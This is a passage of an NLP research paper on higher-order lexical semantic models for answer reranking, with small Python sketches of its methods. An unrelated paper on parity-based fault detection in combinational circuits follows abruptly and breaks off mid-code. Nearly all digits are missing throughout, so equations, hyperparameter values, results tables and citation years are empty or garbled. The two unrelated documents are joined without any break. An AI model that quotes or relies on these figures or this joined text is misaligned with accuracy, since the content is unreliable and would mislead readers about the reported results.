of syntactic dependencies, instead of bags of words, to nnlms, and builds an lm over dependencies rather than words. however, be- cause the nnlm embeddings are generated from context, we must find a consistent ordering of de- pendencies that maintains contextual information. here we order dependencies using a depth-first, left-to-right traversal of the dependency graph originating at the predicate or root node. 
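A minimal sketch of this ordering scheme is given below: a depth-first, left-to-right walk from the root emits unlabeled (head, dependent) pairs, which then serve as the "tokens" of the dependency NNLM. The toy parse is invented for illustration; the figure that follows gives the paper's own example of the same traversal.

```python
def dfs_dependency_terms(children, words, root):
    """Depth-first, left-to-right traversal of a dependency tree, emitting
    unlabeled (head, dependent) pairs in traversal order.
    children[h] lists the dependents of head h in left-to-right surface order."""
    terms = []
    def visit(head):
        for dep in children.get(head, []):
            terms.append((words[head], words[dep]))
            visit(dep)
    visit(root)
    return terms

# Toy parse of "zoe's diner has great pancakes" (root: "has"):
words = {0: "has", 1: "diner", 2: "zoe's", 3: "pancakes", 4: "great"}
children = {0: [1, 3], 1: [2], 3: [4]}
print(dfs_dependency_terms(children, words, root=0))
# [('has', 'diner'), ('diner', "zoe's"), ('has', 'pancakes'), ('pancakes', 'great')]
```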
fig- ure shows an example of such a traversal, which results in the following ordering (using unlabeled dependencies): ( ) be time time the time same be country country no be should be business business the business concealing concealing history history its figure : dfs l→r ordering of word pairs starting from the sentential root. the sentence is taken from ltw eng . of the english gigaword. the model uses the default word vec imple- mentation to compute the term embeddings. to our knowledge, this syntax-driven extension of nnlms is novel. during tuning we compared the labeled and unlabeled dependency representations against an nnlm model using traditional bigrams (where words are paired based on their linear order, i.e., without any syntactic motivation). again, we found that unlabeled dependencies outperformed surface bigrams and labeled dependencies. lastly, we also evaluate the recent nnlm model proposed by levy and goldberg ( a), who modified the word vec embedding proce- dure to include context derived from dependen- cies, arguing that this embedding model encodes functional similarity better than mikolov et al.’s unigram surface structure model. it is important to note that while in our syntactic nnlm model the lm terms are (lexicalized unlabeled) syntactic dependency tuples, in levy and goldberg’s model the lm terms are still words, but the context is driven by syntax instead of surface structure. higher-order lexical models the first-order models we have just described make use of the direct evidence seen in training data to create associations between words (or de- pendencies). unfortunately this training data is often quite sparse, and while it may be possi- ble to exhaustively create training data with broad other ordering schemes were tested during development, but dfs proved to be the most stable across sentences. coverage for artificially narrow domains such as things to eat for breakfast, this quickly becomes intractable for larger domains. to mitigate this sparsity, here we propose a method that identifies associations that were not explicitly seen during training. returning to our example in § , had an alignment model learned the associations break- fast – pancakes and pancakes – hashbrowns, the model should be able to make use of the indi- rect association between breakfast – hashbrowns to further “bridge the lexical chasm”, and iden- tify answer candidates containing the word hash- browns to the question where is a good place to eat breakfast? at first glance, algorithms such as pager- ank (page et al., ) appear to offer an attractive and intuitive method to determine the association between arbitrary nodes in a weighted graph by modeling a random walk to convergence (from any given starting node). as we show in section , we have found that these methods quickly accumulate semantic drift (mcintosh, ), because: (a) they run to convergence, i.e., they traverse paths of ar- bitrary length, and (b) they explore the entire asso- ciation space encoded in the neighborhood graph, both of which introduce considerable noise. for example, by chaining even small numbers of di- rect associations, such as breakfast – pancakes, pancakes – hashbrowns, hashbrowns – potato, and potato – field, a model that does not control for se- mantic drift may be tempted to answer questions about breakfast venues with answers that discuss wheat fields or soccer fields. thus, keeping these indirect associations short and on-context is criti- cal for qa. 
based on the above observations, here we out- line a general method for creating higher-order lexical semantic models that incorporate simple measures to control for semantic drift, and demon- strate how to apply it to both alignment graph rep- resentations and the distributed vector space repre- sentations of a nnlm. our method relies on two general properties of the first-order ls models: (a) all models include a distributed representation for each term that is encoded as a vector (e.g., for nnlms this is a term’s embedding in vector space, and for alignment models this is a vector of alignment probabilities from a given answer term to all possible question terms), and (b) models de- henceforth we use “term” to indicate either a word or a dependency in a lexical semantics model. fine a pairwise function that assigns a lexical sim- ilarity score between pairs of directly connected terms (e.g., for nnlms this is the cosine similar- ity of the corresponding term embeddings, and for alignment models this is given directly by t(q|a), from equation ). intuitively, we incorporate indirect evidence in our models by averaging the distributed represen- tation of a term t with the distributed representa- tions of its neighbors, i.e., those terms with high- est lexical similarity to t. to control for seman- tic drift we consider: (a) only the k most similar neighbors to the current term, and (b) short paths in the association graph, e.g., neighbors of neigh- bors but no further. for example, for a second- order model, we construct this new vector repre- sentation for each node in the graph by averaging the vector of the node itself and the vectors of its k closest neighbors (weighted by each pair’s similar- ity), so that the vector representation of breakfast becomes a weighted sum of breakfast, morning, food, cereal, and so forth. by using only the clos- est neighbors, we exclude low associates of break- fast, such as spoon or vacation, which are only marginally related and therefore likely to generate semantic drift. formally, let w be the vector representation (ei- ther from an nnlm or alignment model) of a given term. we construct a higher-order represen- tation ŵ by linearly interpolating w with its top associates, those vectors with highest value of a pairwise scoring function s: ŵ(i) = ∑ j∈nk(w(i)) s(w(i),w(j)) w(j) ( ) where s is the function that measures the lexi- cal similarity between terms, and depends on the representations used (salign or scos, see below). nk(w(i)), the neighborhood of the vector w(i), denotes the indices of the k term vectors with highest values of s(w(i), ·), and k is a hyperpa- rameter that controls how many vectors are inter- polated. the resulting vectors are renormalized, as discussed later. it is important to note that this process of creating higher-order vectors can be trivially nk(w) includes w, because in all ls models proposed here, each term has maximal similarity with itself. the nor- malization applied after combining all vectors has the effect of modulating the contribution of the vector w in the higher order representation ŵ, based on how similar the other vec- tors in nk(w) are to w. iterated arbitrarily, constructing a second-order model from a first-order model, then a third-order model from a second, etc. intuitively, this models paths of increasing length in the association graph over terms. we now describe the concrete implementations of the procedure in the alignment and the nnlm settings. 
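Before the two concrete instantiations, a generic sketch of Eq. (6) may be useful: each term's vector is replaced by a similarity-weighted sum of its k most similar associates (including itself), and applying the operation repeatedly yields second-, third-, and higher-order representations. Only the renormalization and the choice of similarity differ between the alignment and NNLM variants; the softmax weighting used in the NNLM case is omitted here for brevity.

```python
import numpy as np

def higher_order(vectors, sims, k=5, l1=False):
    """One application of Eq. (6). vectors is an (n_terms x dim) array; sims[i, j]
    holds s(w(i), w(j)), e.g. translation probabilities t(term_j | term_i) for the
    alignment variant or cosine similarities for the NNLM variant. Each term's
    vector becomes a weighted sum of its k nearest associates, then is renormalized
    (L1 for probability distributions, L2 for embeddings)."""
    new_vectors = np.zeros_like(vectors, dtype=float)
    for i in range(len(vectors)):
        neighbours = np.argsort(-sims[i])[:k]        # top-k associates of term i (self included)
        for j in neighbours:
            new_vectors[i] += sims[i, j] * vectors[j]
        norm = np.abs(new_vectors[i]).sum() if l1 else np.linalg.norm(new_vectors[i])
        if norm > 0:
            new_vectors[i] /= norm
    return new_vectors

# Iterating the operation (recomputing similarities from the new vectors as needed)
# constructs the 3rd-, 4th-, ... order models described above.
```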
higher-order alignment: in the alignment set- ting, where the vector w(i) for term i contains the probabilities that the source (answer) term i is aligned with the destination (question) term j, we use salign(w(i),w(j)) = t(termj|termi) ( ) where t is the translation probability from equa- tion ( ). we normalize the ŵ vectors of equa- tion ( ) using the l norm, so that each contin- ues to represent a probability distribution. in- tuitively, the second-order alignment distribution ŵ(i) for source term i is a linear combination of term i’s most probable destination terms’ distri- butions, weighted by the destination probabilities from w(i). the higher-order models greatly reduce the sparsity of the first-order alignment graph. in a first-order word alignment model (i.e., using only direct evidence) trained on approximately , question/answer pairs (see § . ), source words align with an average of destination words with non-zero probability, out of a , word vocabulary. the second-order model aligns , destination words to each source word on average; the third-order model, , ; and the fourth-order model, , . in the results section, we observe that this sparsity reduction is only helpful up to a certain point; having too many associates for each word reduces performance on the qa task. higher-order nnlm: in the nnlm setting, we use the cosine similarity of vectors as interpolation weights and to choose the nearest neighbors: scos(w(i),w(j)) = w(i) ·w(j) ||w(i)|| ||w(j)|| ( ) we found that applying the softmax function to each term’s vector of k-highest scos similarities, to ensure all interpolation weights are positive and have a consistent range across terms, improved performance. as such, all higher-order nnlm models use this softmax normalization. the resulting interpolation can be conceptual- ized in several ways. viewing cosine similarity as a representation of entailment (beltagy et al., ), the higher-order nnlm model reflects multiple-hop inference on top of the correspond- ing association graph, similar to the higher-order alignment model. the interpolation could also be viewed as smoothing term representations in vector space, averaging each term’s vector with its nearest neighbors according to their cosine similarity. higher-order hybrid model: we also imple- ment a hybrid model, which interpolates the align- ment distribution vectors, but using the pairwise cosine similarities from the nnlm setting: ŵa(i) = ∑ j∈nk(wn(i)) scos(wn(i),wn(j)) wa(j) where wn(i) and wa(i) are respectively the nnlm vector and alignment vector representa- tions for term i, and scos is cosine similarity. in addition, we experimented with the opposite hy- brid model: interpolating the nnlm vectors us- ing alignment associate probabilities as weights, but found that it did not perform as well as using nnlm similarities to interpolate alignment vec- tors. our conjecture is that the higher order tech- nique can be viewed as a method of reducing spar- sity (either in the vectors or in the context used to create them), and since the nnlm vectors trained on words (as opposed to dependencies) are less sparse, they benefit less from this technique. experiments . data to test the utility of our approach, we experi- mented with the qa scenario introduced in § using the subset of yahoo! answers corpus in- troduced by jansen et al. ( ) . yahoo! an- swers is an open domain community-generated qa site, with questions and answers that span for- mal and precise to informal and ambiguous lan- guage. 
this corpus contains , qa pairs from a corpus of how questions. each question contains at least four community-generated answers, one of which was voted as the top answer. the number of answers to each question ranged from to over , http://nlp.sista.arizona.edu/ releases/acl http://answers.yahoo.com http://nlp.sista.arizona.edu/releases/acl http://nlp.sista.arizona.edu/releases/acl http://answers.yahoo.com with the average . % of qa pairs were used for training, % for development, and % for test. the following additional resources were used: nnlm corpus: we generated vector represen- tations for words using the word vec model of mikolov et al. ( ), using the skip-gram architecture with hierarchical sampling. vec- tors are trained using the entire gigaword cor- pus of approximately g words. we used - dimensional vectors (jansen et al., ). alignment corpus: we use a separate partition of qa pairs to train an alignment model between questions and top answers. this corpus of , qa pairs does not overlap with the collection of , pairs used for the training, development, and testing partitions, but was chosen according to the same criteria. the alignment model was trained using giza++ over five iterations of ibm model . . tuning the following hyperparameters were tuned inde- pendently to maximize p@ on the development partition of the yahoo! answers dataset: number of vectors interpolated: we investi- gated the effects of varying k in eq. , i.e., the number of most-similar neighbor vectors interpo- lated when constructing a higher-order model. we experimented with values of k ranging from to and found that the value does not substantially affect results across the second-order word align- ment models. since vectors used in the higher- order interpolation are weighted by their similar- ity to a vector w, this is likely due to a swift de- crease in values of the pairwise similarity function, s(w, ·), beyond the vectors closest to w. we chose to use k = because it comes from a stabler maximum, and it is sufficiently small to make con- struction of higher-order models feasible in terms of time and memory usage. base representation type: we compared the effects of using either words or lemmas as the base lexical unit for the ls models, and found that words achieved higher p@ scores in both the alignment and nnlm models on the develop- ment dataset. as such, all results reported here use words for the syntax-independent models, and tu- ples of words for the syntax-driven models. content filtering: we investigated using part- of-speech (pos) tags to filter the content consid- ldc catalog number ldc t ered by the lexical similarity models, by excluding certain non-informative classes of words such as determiners. using pos tags generated by stan- ford’s corenlp (manning et al., ), we fil- tered content to only include nouns, adjectives, verbs, and adverbs for the word-based models, and tuples where both words have one of these four pos tags for the syntax-based models. we found that this increased p@ scores for all word- based alignment and nnlm models (including the levy-goldberg (l-g) model ), but did not improve performance for models that used depen- dency representations. results reported in the remainder of this paper use this pos filtering for all word-based alignment and nnlm models (in- cluding l-g’s) as well as the dependency align- ment model, but not for our dependency nnlm model. . 
baselines we compare against five baseline models: random: selects an answer randomly; cr: uses the ranking provided by our shallow an- swer candidate retrieval (cr) component; jansen et al. ( ): the best-performing lexi- cal semantic model reported in jansen et al. ( ) (row in their table ). pru: pagerank (page et al., ) with uni- form teleportation probabilities, constructed over the word alignment graph. let a be the row- stochastic transition matrix of this graph, where the ith row of a is the vector w(i) (see § . ). fol- lowing the pr algorithm, we add small “teleporta- tion” probabilities from a teleportation matrix t to the alignment matrix, producing a pagerank we modified the l-g algorithm to ignore any dependen- cies not matching this filtering criterion when building the context for a word. we hypothesize that our filtering criterion for dependen- cies, which requires both head and modifiers to have one of the four pos tags, was too aggressive. we will explore other filtering criteria in future work. although filtered dependencies yielded slightly lower re- sults in our tuning experiments, we use them in the depen- dency alignment experiments because the unfiltered third- order dependency alignment model was too large to fit into memory. we do not report the performance of their discourse- based models, because these models use additional resources making them incompatible with the work shown here. we construct the teleportation matrix t by setting each row of t to be a uniform probability distribution, i.e., each entry in a row of t is /|v |, where |v | is the vocabulary size. matrix p = α∗a + ( −α) ∗t . following pre- vious work (page et al., ), we used α = . . then, we compute the matrix products p ,p , ..., using rows in these products as vector representa- tions for terms. thus, the ith row of pk gives the conditional probabilities of arriving at each term in the graph after k transitions beginning at term i. prp: personalized pagerank (agirre and soroa, ). this method follows the same algorithm as pru, but uses nnlm similarities of terms to de- fine non-uniform teleportation probabilities (fol- lowing the intuition that teleportation likelihood should be correlated with semantic similarity of terms). in particular, we obtain the ith row of t by computing the pairwise cosine similarities of term i’s nnlm vector with every other term’s vector, and taking the softmax of these similarities to produce a probability distribution, v(i). to ac- count for missing terms (due to the difference in the alignment and nnlm corpora) we smooth all teleportation probabilities by adding a small value, �, to each entry of v(i). the renormalized v(i) then becomes the ith row of t . . results analysis of higher-order models table shows the performance of first-order and higher-order alignment and nnlm models across representation type. rows in the table are labeled with the orders of the representations used. w in- dicates a model where the base units are words, while d indicates a model where the base units are dependencies; a denotes an alignment model, while n denotes an nnlm model. distinct fea- tures are generated for each order representation (§§ . , . , ) and used in the svm model. for example, wn( - ) uses features constructed from the st, nd, and rd order representations of the word-based nnlm. combining multiple orders into a single feature space is important, as each or- der captures different information. 
for example, the top five closest associates for the term dog un- der wn( ) are: puppy, cat, dogs, dachshund, and pooch, whereas the top associates under wn( ) are: mixedbreed, hound, puppy, rottweiler, and groomer. aggregating features from all orders into a single ranking model guarantees that all this information is jointly modeled. we use the standard implementations for pre- cision at (p@ ) and mean reciprocal rank (mrr) (manning et al., ). several trends are apparent in the table: (i) all first-order lexical models outperform the random and cr baselines, as well as the system of jansen et al. the latter result is explained by the novel features proposed in § . and § . . we detail the contribution of these features in the ab- lation experiment summarized later in table . (ii) more importantly, both p@ and mrr gener- ally increase as we incorporate higher-order ver- sions of each lexical model. out of the six ls models investigated, five improve under their cor- responding higher-order configurations. this gain is most pronounced for the dependency align- ment (da) model, whose p@ increases from . % for the first-order model to . % for a model that incorporates first, second, and third- order features. in general, the performance in- crease in higher-order models is larger for sparser first-order models, where the higher-order mod- els fill in the knowledge gaps of their correspond- ing first-order variants. this sparsity is gener- ated by multiple causes: (a) alignment models are sparser than nnlms because they were trained on less data (approximately k question-answer pairs vs. the entire gigaword); (b) models that use syntactic dependencies as the base lexical units are sparser than models that use words. we conjec- ture that this is why we see the biggest improve- ment from higher order for da (which combines both sources of sparsity), and we do not see an improvement for the word-based nnlm (wn). this hypothesis is supported by the analysis of the corresponding association graphs: in the wa model, counting the number of words compris- ing the top % of the probability mass distribu- tion for each word shows sparse representations with . most-similar words on average; in the wn model, the same statistic shows dense dis- tributed representations with the top % of mass distributed across . million most-similar words per word (or, about % of the vocabulary). (iii) the higher-order models perform well up to an order of or , but not further. for exam- ple, the performance of the word alignment model (wa) decreases at order (row ); similarly, the performance of the word nnlm (wn) decreases at order (row ). this supports our initial ob- servation that long paths in the association graph accumulate noise, which leads to semantic drift. (iv) the levy-goldberg nnlm (dnl-g) is the best first-order model, whereas our dependency- p@ mrr # model p@ impr. mrr impr. baselines random . . cr . – . – jansen et al. ( ) . – . – word alignment (wa) cr + wa( ) . + % . + % cr + wa( - ) . * + % . * + % cr + wa( - ) . * + % . * + % cr + wa( - ) . * + % . * + % word nnlm (wn) cr + wn( ) . + % . + % cr + wn( - ) . + % . + % cr + wn( - ) . + % . + % cr + wn( - ) . + % . + % cr + wn( - ) . + % . + % dependency alignment (da) cr + da( ) . + % . + % cr + da( - ) . * + % . * + % cr + da( - ) . * + % . * + % our dependency nnlm (dno) cr + dno( ) . + % . + % cr + dno( - ) . * + % . * + % cr + dno( - ) . * + % . * + % levy-goldberg dependency nnlm (dnl-g) cr + dnl-g( ) . + % . + % cr + dnl-g( - ) . + % . 
+ % cr + dnl-g( - ) . + % . + % hybrid model: word alignment with nnlm similarity (wan) cr + wan( - ) . + % . + % cr + wan( - ) . * + % . * + % pagerank model: uniform teleportation (pru) cr + pru( ) . + % . + % cr + pru( - ) . * + % . * + % cr + pru( - ) . * + % . * + % pagerank model: personalized teleportation (prp) cr + prp( ) . + % . + % cr + prp( - ) . * + % . * + % cr + prp( - ) . * + % . * + % table : overall results on the yahoo! answers dataset using first-order representations ( ) and first-order in combination with higher-order representations ( -n). bold font indicates the best score in a given column for each model group. an asterisk indicates that a score is significantly better (p < . ) than the first-order version of that model. all significance tests were implemented using one-tailed non-parametric bootstrap resampling using , iterations. model creation time matrix size wa ( ) – mb wa ( ) seconds . gb wa ( ) . minutes . gb wa ( ) . minutes gb pr ( ) – gb pr ( ) . hours gb pr ( ) . hours gb table : runtime and memory requirements for creation of matrices, for the original pagerank and our cautious random walk algorithms. creation of both higher-order wa and pr models is trivially parallelizable, and we report runtimes on a . ghz processor with parallel execution on cores. based nnlm (dno) is the best higher-order model. this is an encouraging result for dno, considering its simplicity. in general, nnlms perform better than alignment models for answer reranking, which is not surprising considering the difference in size of the training datasets. to our knowledge, this is the first time this type of analy- sis has been performed for qa. (v) both pru( - ) and prp( - ) perform better than their first-order variants and better than our p@ mrr # model/features p@ impr. mrr impr. baselines random . . cr . – . – jansen et al. ( ) . – . – words cr + wa( ) + wn( ) . + % . cr + wa( - ) + wn( - ) . * + % . * + % cr + wa( - ) + wn( - ) . * + % . * + % cr + wa( - ) + wn( - ) . + % . + % dependencies cr + da( ) + dno( ) + dnl-g( ) . + % . + % cr + da( - ) + dno( - ) + dnl-g( - ) . * + % . * + % cr + da( - ) + dno( - ) + dnl-g( - ) . * + % . * + % words and dependencies cr + wa( ) + wn( ) + da( ) + dno( ) + dnl-g( ) . + % . + % cr + wa( - ) + wn( - ) + da( - ) + dno( - ) + dnl-g( - ) . † + % . † + % cr + wa( - ) + wn( - ) + da( - ) + dno( - ) + dnl-g( - ) . † + % . † + % table : performance on the yahoo! answers dataset for word, dependency, and models that combine the word and de- pendency representations. bold font indicates the best score in a given column for each model group. an asterisk indicates that a score is significantly better (p < . ) than the first-order version of that model group ( ), and † indicates that a score approaches significance (p < . ). p@ mrr model p@ delta mrr delta cr + wa( ) all features . – . – − p(q|a) . - % . - % − max jsd . % . % − min jsd . - % . - % − composite jsd . - % . % − average jsd . - % . - % cr + wn( ) all features . – . – − max cosine sim. . - % . - % − min cosine sim. . - % . - % − composite cosine sim. . - % . - % − average cosine sim. . - % . - % table : ablation experiments for first-order word models. each row removes a single feature from the corresponding complete model (“all features”). word-based second-order models (wa and wn). as expected, the personalized pr algorithm per- forms better than pru. 
however, their perfor- mance drops for the third-order models (rows and ), whereas our models continue to improve in their third-order configuration. all our third- order models perform better than all third-order pr models. this is caused by our “cautious” traversal strategy that considers only the closest neighbors during random walks, which controls for semantic drift better than the pr methods. fur- thermore, the resources required for pr are con- siderably larger than the ones needed to imple- ment our methods. table summarizes the re- quirements of the pr algorithm compared to our closest method (wa). as the table shows, pr has a runtime that is two orders of magnitude larger than wa’s, and requires four times as much mem- ory to store the generated higher-order matrices. combining nnlms and alignment models we explore combinations of nnlms and align- ment models in table , which lists results when higher-order nnlms and alignment models are combined for a given representation type. each line in the table corresponds to a single an- swer reranking model, which incorporates features from multiple ls models. these experiments re- inforce our previous observations: higher-order models perform better than their first-order vari- ants regardless of representation type, but perfor- mance increases only for relatively low orders, e.g., orders for words and words combined with dependencies, or orders for dependencies. importantly, the table shows that the combina- tion of nnlms and alignment models across rep- resentation types is beneficial. for example, the best first-order combined model (row in ta- ble ) performs similarly to the best higher-order individual ls model (row in table ). the best combined higher-order model (row in ta- ble ) has a p@ score of . , approximately . % higher than the best individual ls model (row in table ). to our knowledge, this is the highest performance reported on this yahoo! an- swers corpus, surpassing the best model of jansen et. al ( ), which incorporates both shallow and deep discourse information, and achieves . p@ . feature ablation experiments although the main focus of this work is on higher- order ls models, table shows that even our first-order models perform better than the previous state of the art. this is caused by the novel features proposed over alignment models and nnlms. to understand the contribution of each of these fea- tures, we performed an ablation experiment, sum- marized in table , for two models: one alignment model (wa), and one nnlm (wn). this analysis indicates that many of the features proposed are important. for example, two of the novel jsd fea- tures for wa have a higher contribution to over- all qa performance than the alignment probability (p(q|a)) proposed in previous work (surdeanu et al., ). for wn, the two new features pro- posed here (maximum and minimum cosine sim- ilarity between embedding vectors) also have a positive contribution to overall performance, but less than the other two features proposed in previ- ous work (yih et al., ; jansen et al., ). . discussion one important observation yielded by the previ- ous empirical analysis is that higher-order models perform well for sparse first-order variants (e.g., da), but not for first-order models that rely on already dense association graphs (e.g., wn). we suspect that in densely populated graphs, model- ing context becomes critical for successful higher- order models. 
returning to our example from § , a densely populated graph may already have the associations breakfast – pancakes and pancakes – hashbrowns that allow it to identify restaurants with favorable breakfast foods. exploring higher-order associations in this situation is only beneficial if context is carefully maintained; otherwise an answer reranking system may erroneously select answer candidates with different contexts due to accumulated semantic drift (e.g., answers that discuss films, using associations from texts reviewing breakfast at tiffany's). incorporating word-sense disambiguation or topic modeling into alignment or nnlm models may begin to address these contextual issues by preferentially associating terms within a given topic (such as restaurants or films), ultimately reducing semantic drift and extending these higher-order methods beyond a few hops in the graph. our analysis suggests that the extra sparsity that contextually-dependent representations introduce may make those models even more amenable to the higher-order methods discussed here.

more generally, we believe that graph-based inference provides a robust but approximate middle ground to inference for qa. where inference using first-order logic offers provably-correct answers but is relatively brittle (see ch. in maccartney ( )), ls methods offer robustness, but have lacked explanatory power and the ability to connect knowledge into short inference chains. here we have demonstrated that higher-order methods capitalize on indirect evidence gathered by connecting multiple direct associations, and in doing so significantly increase performance over ls approaches that use direct evidence alone. by incorporating contextual information and making use of the short inference chains generated by traversing these graphical models, we hypothesize that graph-based systems will soon be able to construct simple justifications for their answer selection (e.g., pancakes are a breakfast food, and hashbrowns go well with pancakes). we hope it will soon be possible to fill this gap in inference methods for qa with higher-order ls models for robust but approximate inference.

conclusions

we introduce a higher-order formalism that allows lexical semantic models to capitalize on both direct and indirect evidence. we demonstrate that many lexical semantic models, including monolingual alignment and neural network language models, working over surface or syntactic representations, can be trivially adapted to this higher-order formalism. using a corpus of thousands of non-factoid how questions, we experimentally demonstrate that higher-order methods perform better than their first-order variants for most lexical semantic models investigated, with statistically-significant relative gains of up to % over the corresponding first-order models.

acknowledgements

we thank the allen institute for artificial intelligence for funding this work. we would also like to thank the three anonymous reviewers for their helpful comments and suggestions.

references

eneko agirre and aitor soroa. . personalizing pagerank for word sense disambiguation. in proceedings of the th conference of the european chapter of the association for computational linguistics.
marco baroni, georgiana dinu, and germán kruszewski. . don't count, predict! a systematic comparison of context-counting vs. context-predicting semantic vectors. in proceedings of the nd annual meeting of the association for computational linguistics.
islam beltagy, cuong chau, gemma boleda, dan garrette, katrin erk, and raymond mooney. . montague meets markov: deep semantics with probabilistic logical form. in proceedings of the second joint conference on lexical and computational semantics.
adam berger, rich caruana, david cohn, dayne freytag, and vibhu mittal. . bridging the lexical chasm: statistical approaches to answer finding. in proceedings of the rd annual international acm sigir conference on research & development on information retrieval.
gaurav bhalotia, arvind hulgeri, charuta nakhe, soumen chakrabarti, and shashank sudarshan. . keyword searching and browsing in databases using banks. in proceedings of th international conference on data engineering (icde).
peter f. brown, stephen a. della pietra, vincent j. della pietra, and robert l. mercer. . the mathematics of statistical machine translation: parameter estimation. computational linguistics, ( ): – .
soumen chakrabarti and alekh agarwal. . learning parameters in entity relationship graphs from ranking preferences. in proceedings of th european conference on principle and practice of knowledge discovery in databases (pkdd).
soumen chakrabarti. . dynamic personalized pagerank in entity-relation graphs. in proceedings of the th international world wide web conference (www).
marie-catherine de marneffe, bill maccartney, and christopher d. manning. . generating typed dependency parses from phrase structure parses. in proceedings of the international conference on language resources and evaluation (lrec).
abdessamad echihabi and daniel marcu. . a noisy-channel approach to question answering. in proceedings of the st annual meeting of the association for computational linguistics (acl).
oren etzioni. . search needs a shake-up. nature, ( ): – .
peter jansen, mihai surdeanu, and peter clark. . discourse complements lexical semantics for non-factoid answer reranking. in proceedings of the nd annual meeting of the association for computational linguistics (acl).
ni lao and william w. cohen. . relational retrieval using a combination of path-constrained random walks. machine learning, ( ): – .
ni lao, tom mitchell, and william w. cohen. . random walk inference and learning in a large scale knowledge base. in proceedings of the conference on empirical methods in natural language processing (emnlp).
heeyoung lee, marta recasens, angel chang, mihai surdeanu, and dan jurafsky. . joint entity and event coreference resolution across documents. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning (emnlp-conll).
omer levy and yoav goldberg. a. dependency-based word embeddings. in proceedings of the nd annual meeting of the association for computational linguistics (acl).
omer levy and yoav goldberg. b. linguistic regularities in sparse and explicit word representations. in proceedings of the conference on computational natural language learning (conll).
dekang lin. . automatic retrieval and clustering of similar words. in proceedings of the th annual meeting of the association for computational linguistics and the th international conference on computational linguistics (coling-acl- ).
bill maccartney. . natural language inference. ph.d. thesis, stanford university.
christopher d. manning, prabhakar raghavan, and hinrich schütze. . introduction to information retrieval. cambridge university press.
christopher d. manning, mihai surdeanu, john bauer, jenny finkel, steven j.
bethard, and david mcclosky. . the stanford corenlp natural language processing toolkit. in proceedings of the nd annual meeting of the association for computational linguistics (acl).
tara mcintosh. . reducing semantic drift in biomedical lexicon bootstrapping. ph.d. thesis, university of sydney.
tomas mikolov, kai chen, greg corrado, and jeffrey dean. . efficient estimation of word representations in vector space. in proceedings of the international conference on learning representations (iclr).
einat minkov, william w. cohen, and andrew y. ng. . contextual search and name disambiguation in email using graphs. in proceedings of sigir.
vanessa murdock and w. bruce croft. . a translation model for sentence retrieval. in proceedings of the conference on human language technology and empirical methods in natural language processing, pages – .
courtney napoles, matthew gormley, and benjamin van durme. . annotated gigaword. in proceedings of the joint workshop on automatic knowledge base construction and web-scale knowledge extraction, pages – . association for computational linguistics.
franz josef och and hermann ney. . a systematic comparison of various statistical alignment models. computational linguistics, ( ): – .
lawrence page, sergey brin, rajeev motwani, and terry winograd. . the pagerank citation ranking: bringing order to the web. technical report - , stanford infolab, november.
stefan riezler, alexander vasserman, ioannis tsochantaridis, vibhu mittal, and yi liu. . statistical machine translation for query expansion in answer retrieval. in proceedings of the th annual meeting of the association for computational linguistics (acl).
radu soricut and eric brill. . automatic question answering using the web: beyond the factoid. journal of information retrieval - special issue on web information retrieval, ( ): – .
md. arafat sultan, steven bethard, and tamara sumner. . back to basics for monolingual alignment: exploiting word similarity and contextual evidence. transactions of the association for computational linguistics, : – .
mihai surdeanu, massimiliano ciaramita, and hugo zaragoza. . learning to rank answers to non-factoid questions from web collections. computational linguistics, ( ): – .
hanghang tong, christos faloutsos, and jia-yu pan. . fast random walk with restart and its applications. in proceedings of the th international conference on data mining (icdm).
xin-jing wang, xudong tu, dan feng, and lei zhang. . ranking community answers by modeling question-answer relationships via analogical reasoning. in proceedings of the annual acm sigir conference.
max whitney and anoop sarkar. . bootstrapping via graph propagation. in proceedings of the th annual meeting of the association for computational linguistics.
xuchen yao, benjamin van durme, chris callison-burch, and peter clark. . semi-markov phrase-based monolingual alignment. in proceedings of the conference on empirical methods in natural language processing (emnlp).
david yarowsky. . unsupervised word sense disambiguation rivaling supervised methods. in proceedings of the rd annual meeting of the association for computational linguistics (acl).
wen-tau yih, ming-wei chang, christopher meek, and andrzej pastusiak. . question answering using enhanced lexical semantic models. in proceedings of the st annual meeting of the association for computational linguistics (acl).
benat zapirain, eneko agirre, lluis marquez, and mihai surdeanu. .
selectional preferences for semantic role classification. computational linguistics, ( ).

a fault detection method for combinational circuits

ali abbass zoraghchian , moslem didehban , mohammadreza mehrabian
.department of computer engineering, allame mohaddes noori institute of higher education, mazandaran, iran, zaliabbass@yahoo.com
.department of computer engineering and information technology, amirkabir university of technology, tehran, iran, m_didehban@aut.ac.ir
.department of computer engineering and information technology, amirkabir university of technology, tehran, iran, mhrb @aut.ac.ir

abstract. as transistors become increasingly smaller and faster and noise margins become tighter, circuits and chips, especially microprocessors, tend to become more vulnerable to permanent and transient hardware faults. most microprocessor designers focus on protecting memory elements, among other parts of microprocessors, against hardware faults by adding redundant error-correcting bits such as parity bits. however, the rate of soft errors in the combinational parts of microprocessors is nowadays considered as important as in sequential parts such as memory elements. the reason is that advances in scaling technology have led to reduced electrical masking. this paper proposes and evaluates a logic-level fault-tolerant method based on parity for designing combinational circuits. experimental results on a full adder circuit show that the proposed method makes the circuit fault-tolerant with less overhead in comparison with traditional methods. it will also be demonstrated that our proposed method enables the traditional tmr method to detect multiple faults in addition to single fault masking.

keywords: soft error, transient fault, fault-tolerance, combinational circuits, full adder.

. introduction

as transistor dimensions have shrunk and the scale of integration in electronic switches has increased, chip fabricators can place more than one billion transistors on a single chip. such an integration scale can increase the performance of chips, and many new architectural techniques, such as superscalar and chip multiprocessor (cmp) designs, actually need that many transistors. however, the ever-increasing nonlinear power consumption in this technology trend could be a disaster for circuits, because transistor density is rising sharply. to prevent this problem we have to decrease the supply voltage, and this change reduces the noise margin of the circuit [ ]. on the other hand, as the feature size shrinks, the critical charge qcritical (the electrical charge of the node capacitances) decreases too, which increases the probability of fault occurrence in the circuit [ ]. it has been shown that large-scale circuit integration increases the failure rate exponentially [ ]. generally, new-generation technologies are less reliable than the old ones. some of the reasons for these problems are: lower cl (load capacitance), lower vdd or vcc (supply voltage) leading to a smaller noise margin, lower qcritical, more process variation [ ] and manufacturing defects [ ]. these factors affect reliability, which is a key concept alongside the performance and power metrics and calls for a fault-tolerance mechanism [ , , ]. typically, all components of a chip can be classified into two categories: logic blocks and memory elements. commercial microprocessors typically use error correction codes (eccs) to protect these circuit elements.
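as a reminder of how such a parity check works in principle, the following minimal python sketch stores one even-parity bit with a data word and flags a single bit flip; it is a generic textbook illustration, not the ecc scheme of any particular microprocessor.

def even_parity(bits):
    # 0 if the number of 1s in the data is already even, 1 otherwise
    return sum(bits) % 2

def store(bits):
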